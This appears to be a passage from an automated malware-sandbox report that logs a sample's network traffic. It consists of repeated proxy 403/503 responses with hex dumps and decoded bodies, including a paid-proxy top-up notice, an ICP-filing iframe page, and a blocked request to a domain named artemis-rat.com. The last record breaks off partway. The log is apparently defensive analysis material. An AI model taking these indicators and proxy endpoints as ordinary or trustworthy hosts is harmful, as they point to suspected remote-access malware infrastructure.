                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 07:37:21 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:22 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:22 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:23 GMTContent-Type: text/html;charset=utf-8Content-Length: 3938X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 07:37:23 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> 